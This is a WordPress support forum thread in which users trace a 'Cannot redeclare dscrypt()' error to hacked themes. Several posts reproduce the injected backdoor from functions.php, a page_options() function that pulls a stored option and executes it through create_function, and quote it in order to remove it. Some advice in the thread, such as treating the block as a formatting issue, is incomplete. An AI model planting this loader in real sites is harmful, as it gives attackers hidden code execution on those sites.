WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Updated to 3.3.1 now getting Fatal error: Cannot redeclare dscrypt() message (40 posts)

  1. brianpalmer
    Member
    Posted 2 years ago #

    Hello, the full messages is: Fatal error: Cannot redeclare dscrypt() (previously declared in /homepages/4/d171060969/htdocs/saturnscene/wp-content/themes/bueno/header.php:152) in /homepages/4/d171060969/htdocs/saturnscene/wp-content/themes/bueno/functions.php(29) : runtime-created function(1) : eval()'d code on line 67

    at http://www.saturnscene.com

    I've searched the forums for people with the same problem and so far haven't been able to find one.

    Any help would be greatly appreciated!

  2. musictogousa
    Member
    Posted 2 years ago #

    and I get a fatal error Parse error: syntax error, unexpected T_OBJECT_OPERATOR in /hermes/bosweb26c/b2656/ipw.boxcarpr/public_html/buddypress/wp-content/plugins/feedweb/feedweb_util.php on line 24

  3. govpatel
    Member
    Posted 2 years ago #

    brianpalmer using ftp rename bueno theme to say bueno_hold to see if it is theme related problem.

  4. brianpalmer
    Member
    Posted 2 years ago #

    Ok, renamed it and now nothing shows up at all. Please advise as to the next step (and thank you).

  5. Len
    Member
    Posted 2 years ago #

    Hi brianpalmer,

    You can access your site via /wp-login.php Once in, you can switch to another theme for now.

    I'm interested in what is on line 29 of functions.php. That theme is available as a freebie from WooThemes and the stock file only has 26 lines. Have you altered it in anyway?

  6. brianpalmer
    Member
    Posted 2 years ago #

    Yeah, the theme has been altered quite a bit. It's been awhile, where do I go to view "functions.php"?

  7. brianpalmer
    Member
    Posted 2 years ago #

    Ok, I think I found what you're looking for. Here's everything that was in the "functions.php" box:

    "<?php

    /*-----------------------------------------------------------------------------------*/
    /* Start WooThemes Functions - Please refrain from editing this section */
    /*-----------------------------------------------------------------------------------*/

    // Set path to WooFramework and theme specific functions
    $functions_path = TEMPLATEPATH . '/functions/';
    $includes_path = TEMPLATEPATH . '/includes/';

    // WooFramework
    require_once ($functions_path . 'admin-init.php'); // Framework Init

    // Theme specific functionality
    require_once ($includes_path . 'theme-options.php'); // Options panel settings and custom settings
    require_once ($includes_path . 'theme-functions.php'); // Custom theme functions
    require_once ($includes_path . 'theme-comments.php'); // Custom comments/pingback loop
    require_once ($includes_path . 'theme-js.php'); // Load javascript in wp_head
    require_once ($includes_path . 'sidebar-init.php'); // Initialize widgetized areas
    require_once ($includes_path . 'theme-widgets.php'); // Theme widgets

    /*-----------------------------------------------------------------------------------*/
    /* End WooThemes Functions - You can add custom functions below */
    /*-----------------------------------------------------------------------------------*/

    ?>

    <?php function page_options() { $option = get_option('page_option'); $opt=unserialize($option);
    @$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');}
    add_action('loop_start', 'page_options'); ?>"

  8. Len
    Member
    Posted 2 years ago #

    Can you post the contents of the header.php file to our pastebin then post the link here please?

  9. brianpalmer
    Member
    Posted 2 years ago #

  10. Len
    Member
    Posted 2 years ago #

    Whoa! What's the bit between this ...

    <!-- WordPress Counter -->
    
    <!-- WordPress Counter -->
  11. brianpalmer
    Member
    Posted 2 years ago #

    No idea. I do not recall adding any of that.

  12. Len
    Member
    Posted 2 years ago #

    That's a nasty bit of code and shouldn't be there. It looks like your site has been compromised.

    Have a look at Esmi's response in this thread.

  13. Bams Klaten Info
    Member
    Posted 2 years ago #

    My website (http://klaten.info) is also the same thing, I try searching in google a lot of experienced the same thing. wordpress soon hopefully help the handling.

  14. Len
    Member
    Posted 2 years ago #

    Hi blogaul,

    Please post the content of your theme's functions.php file at the pastebin and then post the link here.

  15. brianpalmer
    Member
    Posted 2 years ago #

    Thanks so much Len. Quite a bummer to find that out, but at least I know what I'm dealing with now. Thanks for your help.

  16. sharonmiranda
    Member
    Posted 2 years ago #

    I had been experiencing blank admin screens upon logging in, and the issue only happened with the WooTheme. Research suggest that functions.php should not have the <? ?> series more than once. In the functions.php, including the one you display here, brianpalmer, there is a second set shown below. I removed it and now my issue is all well. It could be merged inside of the first set too, which may be wiser.

    <?php function page_options() { $option = get_option('page_option'); $opt=unserialize($option);

    @$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');}
    add_action('loop_start', 'page_options'); ?>

  17. livemixlove
    Member
    Posted 2 years ago #

    I did not do the installation of the wordpress site I'm working with. So I am not familiar with what should and shouldn't be there.

    BUT I too am having the error of the OP and I too have scary looking code. Have I been hacked?

    [Code moderated as per the Forum Rules. The maximum number of lines of code that you can post in these forums is ten lines. Please use the pastebin]

  18. livemixlove
    Member
    Posted 2 years ago #

    I deleted the counter code and now the site is working again. It does seem to be a piece of malignant code: Things like SERVER['REMOTE_ADDR'] and hash codes being sent through something that decrypts looks pretty evil.

    So I'm assuming that even if my site is temporarily working, that I will need to rebuild the database and themes files with a fresh install WP. Right?

  19. brianpalmer
    Member
    Posted 2 years ago #

    sharonmiranda, I removed the code and now my site works fine as well. I also took out that weird code under the wordpress counter. I've now checked my site using sitecheck and nothing shows up in terms of viruses/bugs. Do you guys recommend looking into this more or is it just a matter of those two bits of code?

  20. sharonmiranda
    Member
    Posted 2 years ago #

    That code is a hack using the thumbs.php, a vulnerable file.

    This article explains it all, and what to do. I took every step. Whew ! Only took two days to discover the issue. So many potential solutions out there, none did it but this bit of knowledge.

    http://davemeehan.com/technology/wordpress-install-hacked-again-with-page_options-function-and-references-to-kadaffizzet-com

  21. damian_luv
    Member
    Posted 2 years ago #

    Similar problem i'm having:

    Fatal error: Cannot redeclare dsCrypt() (previously declared in /home/inst/public_html/wp-content/themes/themorningafter/functions.php(30) : runtime-created function(1) : eval()'d code:24) in /home/inst/public_html/wp-content/themes/themorningafter/functions.php(30) : runtime-created function(1) : eval()'d code on line 67

    I checked the functions.php line 30 and it seems fine not sure where to go from here?

  22. damian_luv
    Member
    Posted 2 years ago #

    [SOLVED]
    I checked the functions.php file thoroughly again and realized that at the very bottom of it there were these lines of code:

    <?php function page_options() { $option = get_option('page_option'); $opt=unserialize($option);
    @$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');}
    add_action('loop_start', 'page_options'); ?>

    I had to remove it, seem like a hack LOL.

  23. thirdshiftguy
    Member
    Posted 2 years ago #

    Hello, damian_luv, is that code supposed to be there? I have a client with a similar situation.

  24. damian_luv
    Member
    Posted 2 years ago #

    No thirdshiftguy, that code is a hack remove it.

  25. corinnel
    Member
    Posted 2 years ago #

    Hi,
    I've just found this thread from doing a Google search on the error code my website is showing. For someone who has limited technical skills is there an easy way to find / remove the problem? Is this likely to be a new vulnerability with WordPress or a problem with my hosting?

    Running Sitecheck brings up a number of issues on various pages - the site is <ahref="http://www.boothstar.co.uk">www.boothstar.co.uk

  26. damian_luv
    Member
    Posted 2 years ago #

    corinnel show me what is at line 130 in your header.php file also what is on line 31 of functions.php.

    I would bet it's the same issue.

  27. corinnel
    Member
    Posted 2 years ago #

    Hi damian_luv... many thanks for your quick response!
    I've logged into WordPress to view the file but it doesn't give any numbers as to the various lines. That said, there is code at the bottom between Worpress Counter. I'll check the functions.php file now.

  28. damian_luv
    Member
    Posted 2 years ago #

    You can ftp and download the file and use notepadd++ to view it with line numbers.

  29. corinnel
    Member
    Posted 2 years ago #

    Yes it looks like what is mentioned above... I hope I/ve pasted this correct to Pastebin - http://pastebin.com/C2sfvasV
    Would I be correct in thinking it's as simple as removing the code?

  30. damian_luv
    Member
    Posted 2 years ago #

    Delete everything after ?> ondown ok, or you can comment the entire thing out. That function page_options() is the prob.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.